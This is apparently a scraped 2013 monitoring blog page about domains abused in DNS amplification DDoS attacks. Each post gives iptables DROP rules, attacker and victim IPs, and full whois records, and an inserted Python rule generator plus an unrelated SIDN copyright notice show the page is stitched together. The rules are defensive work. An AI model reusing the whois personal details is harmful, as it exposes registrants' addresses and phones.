Record maintained by: NL Domain Registry

Copyright notice
No part of this publication may be reproduced, published, stored in a
retrieval system, or transmitted, in any form or by any means,
electronic, mechanical, recording, or otherwise, without prior
permission of the Foundation for Internet Domain Registration in the
Netherlands (SIDN).
These restrictions apply equally to registrars, except in that
reproductions and publications are permitted insofar as they are
reasonable, necessary and solely in the context of the registration
activities referred to in the General Terms and Conditions for .nl
Registrars.
Any use of this material for advertising, targeting commercial offers or
similar activities is explicitly forbidden and liable to result in legal
action. Anyone who is aware or suspects that such activities are taking
place is asked to inform the Foundation for Internet Domain Registration
in the Netherlands.
(c) The Foundation for Internet Domain Registration in the Netherlands
(SIDN) Dutch Copyright Act, protection of authors' rights (Section 10,
subsection 1, clause 1).



Saturday, November 9, 2013

Domain: siska1.com

Domain: siska1.com

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x06534953 && 0x2c&0xDFDFFFFF=0x4b413103 && 0x30&0xDFDFDFFF=0x434f4d00" -j DROP -m comment --comment "DROP DNS Q siska1.com"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 52 --algo bm --hex-string '|067369736b613103636f6d00|' -j DROP -m comment --comment "DROP DNS Q siska1.com"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


80.82.65.206 - AS29073 Ecatel Network

Name server:


;; ANSWER SECTION:
siska1.com. 9267 IN NS a.dns.gandi.net.
siska1.com. 9267 IN NS c.dns.gandi.net.
siska1.com. 9267 IN NS b.dns.gandi.net.


Response:


A 258
MX 2
NS 3
SOA 1
Rsize 4294


Whois



Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: SISKA1.COM
Registrar: GANDI SAS
Whois Server: whois.gandi.net
Referral URL: http://www.gandi.net
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Status: clientTransferProhibited
Updated Date: 09-nov-2013
Creation Date: 09-nov-2013
Expiration Date: 09-nov-2014

>>> Last update of whois database: Sun, 10 Nov 2013 01:00:09 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: siska1.com
Registry Domain ID: 1834806056_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2013-11-10T00:38:25Z
Creation Date: 2013-11-09T17:00:29Z
Registrar Registration Expiration Date: 2014-11-09T16:00:29Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID:
Registrant Name: Kapa JOHNS
Registrant Organization:
Registrant Street: sherbakoskay 45/6
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 127027
Registrant Country: RU
Registrant Phone: +7.9257227864
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: purp.level@mail.ru
Registry Admin ID:
Admin Name: Kapa JOHNS
Admin Organization:
Admin Street: sherbakoskay 45/6
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 127027
Admin Country: RU
Admin Phone: +7.9257227864
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: purp.level@mail.ru
Registry Tech ID:
Tech Name: Kapa JOHNS
Tech Organization:
Tech Street: sherbakoskay 45/6
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 127027
Tech Country: RU
Tech Phone: +7.9257227864
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: purp.level@mail.ru
Name Server: A.DNS.GANDI.NET
Name Server: B.DNS.GANDI.NET
Name Server: C.DNS.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2013-11-10T01:27:38Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Thursday, November 7, 2013

Domain: loo1.ru

Domain: loo1.ru

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x044c4f4f && 0x2c&0xFFFFDFDF=0x31025255 && 0x30&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q loo1.ru"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 49 --algo bm --hex-string '|046c6f6f3102727500|' -j DROP -m comment --comment "DROP DNS Q loo1.ru"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


93.174.93.217 - Ecatel

Name server:


;; ANSWER SECTION:
loo1.ru. 21600 IN NS ns1.reg.ru.
loo1.ru. 21600 IN NS ns2.reg.ru.


Response:


A 231
NS 2
SOA 1
Rsize 3792


Whois



domain: LOO1.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2013.10.17
paid-till: 2014.10.17
free-date: 2014.11.17
source: TCI

Last updated on 2013.11.08 01:41:36 MSK




Wednesday, November 6, 2013

Domain: t.pbub.info

Domain: t.pbub.info

Domain with a personal touch!

If you are seeing queries for this domain, then you are likely participating in DNS amplification attacks, and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently being DDoS-ed! Good luck.


IPtables:


There are two iptables rules available. If your distribution supports the iptables 'u32' module, pick that one; otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFFFDF=0x01540450 && 0x2c&0xDFDFDFFF=0x42554204 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q t.pbub.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 53 --algo bm --hex-string '|0174047062756204696e666f00|' -j DROP -m comment --comment "DROP DNS Q t.pbub.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt
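Both rule styles above (and the loo1.ru rules earlier on this page) follow one recipe: the query name sits 40 bytes into the packet (20-byte IPv4 header, 8-byte UDP header, 12-byte DNS header) in DNS wire format, the 'string' rule matches those exact bytes, and the 'u32' rule matches them word by word with a case-folding mask. The helper below is an added example, not the blog's own tool; the fixed offset is its assumption, so a packet with IP options would shift the name and simply not be dropped.

```python
# Added example: rebuild the page's 'string' and 'u32' rules from a domain.
# Assumes what the page's rules assume: 20-byte IPv4 header (no options),
# 8-byte UDP header, 12-byte DNS header, so the first QNAME starts at byte 40.
QNAME_OFFSET = 40  # assumption, see above


def dns_wire_name(domain: str) -> bytes:
    """Encode a name as DNS wire-format labels: <len><label>...<0x00>."""
    out = bytearray()
    for label in domain.strip(".").split("."):
        if not 1 <= len(label) <= 63:
            raise ValueError(f"bad label length: {label!r}")
        out.append(len(label))
        out += label.encode("ascii")
    out.append(0)
    return bytes(out)


def string_rule(domain: str) -> str:
    """'string' match: exact bytes; window --from/--to = offset..offset+len.
    Case-sensitive as on the page (xt_string's --icase would relax that)."""
    wire = dns_wire_name(domain.lower())
    return (
        f"iptables --insert INPUT -p udp --dport 53 -m string "
        f"--from {QNAME_OFFSET} --to {QNAME_OFFSET + len(wire)} --algo bm "
        f"--hex-string '|{wire.hex()}|' -j DROP "
        f'-m comment --comment "DROP DNS Q {domain}"'
    )


def u32_expr(domain: str) -> str:
    """'u32' match: one 'offset&mask=value' test per 32-bit word of the name.
    Letters get mask 0xDF and an uppercase value (0x20 is the ASCII case bit),
    so it is case-insensitive; lengths, digits, '-' and the final 0x00 are
    matched exactly (0xFF); bytes after the name are ignored (mask 0x00)."""
    wire = dns_wire_name(domain)
    tests = []
    for i in range(0, len(wire), 4):
        word = wire[i:i + 4]
        mask = value = 0
        for b in word:
            m = 0xDF if chr(b).isalpha() else 0xFF
            mask, value = (mask << 8) | m, (value << 8) | (b & m)
        pad = 8 * (4 - len(word))  # right-pad the last, short word
        tests.append(f"0x{QNAME_OFFSET + i:x}&0x{mask << pad:08X}=0x{value << pad:08x}")
    return " && ".join(tests)


def u32_rule(domain: str) -> str:
    return (f'iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "{u32_expr(domain)}" '
            f'-j DROP -m comment --comment "DROP DNS Q {domain}"')
```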

Source:

Source unknown.

Attacked the following IP:

 45,783x   186.2.161.7 - ddos-guard.net


Name server:

bub.info.               21600   IN      NS      c1.wpns.hosteurope.de.
bub.info.               21600   IN      NS      c1.wsns.hosteurope.de.

Response:


TXT 1
Rsize 3896


Very interesting response containing (almost) my blog name:


Oh recognition at last! /sarcasm

Whois


Domain ID:D311-LRMS
Domain Name:BUB.INFO
Created On:25-Jul-2001 16:36:25 UTC
Last Updated On:20-Sep-2013 20:45:10 UTC
Expiration Date:25-Jul-2014 16:36:25 UTC
Trademark Name:BUB
Trademark Date:1979-12-05
Trademark Country:DE
Trademark Number:994458 Deutsches Patentamt Muenchen
Sponsoring Registrar:Mesh Digital Limited (R517-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:MNT87F29245123
Registrant Name:Stephan Sehlhoff
Registrant Organization:BUB Berater-Cooperation
Registrant Street1:Hauptstr. 340
Registrant Street2:BUB Berater-Cooperation
Registrant Street3:
Registrant City:Leopoldshoehe
Registrant State/Province:
Registrant Postal Code:33818
Registrant Country:DE
Registrant Phone:+49.520298360
Registrant Phone Ext.:
Registrant FAX:+49.5202983620
Registrant FAX Ext.:
Registrant Email:info@bauwirtschaft.de
Admin ID:MNT53F29245126
Admin Name:Stephan Sehlhoff
Admin Organization:BUB Berater-Cooperation
Admin Street1:Hauptstr. 340
Admin Street2:
Admin Street3:
Admin City:Leopoldshoehe
Admin State/Province:
Admin Postal Code:33818
Admin Country:DE
Admin Phone:+49.520298360
Admin Phone Ext.:
Admin FAX:+49.5202983620
Admin FAX Ext.:
Admin Email:info@bauwirtschaft.de
Billing ID:MNT2CF29245129
Billing Name:Hostmaster Domain-Registration
Billing Organization:Host Europe GmbH
Billing Street1:Welserstrasse 14
Billing Street2:Host Europe GmbH
Billing Street3:
Billing City:Koeln
Billing State/Province:NRW
Billing Postal Code:51149
Billing Country:DE
Billing Phone:+49.1805467838
Billing Phone Ext.:
Billing FAX:+49.1805663233
Billing FAX Ext.:
Billing Email:support@hosteurope.de
Tech ID:MNT48029245132
Tech Name:Hostmaster Domain-Registration
Tech Organization:Host Europe GmbH
Tech Street1:Welserstrasse 14
Tech Street2:Host Europe GmbH
Tech Street3:
Tech City:Koeln
Tech State/Province:NRW
Tech Postal Code:51149
Tech Country:DE
Tech Phone:+49.1805467838
Tech Phone Ext.:
Tech FAX:+49.1805663233
Tech FAX Ext.:
Tech Email:support@hosteurope.de
Name Server:C1.WPNS.HOSTEUROPE.DE
Name Server:C1.WSNS.HOSTEUROPE.DE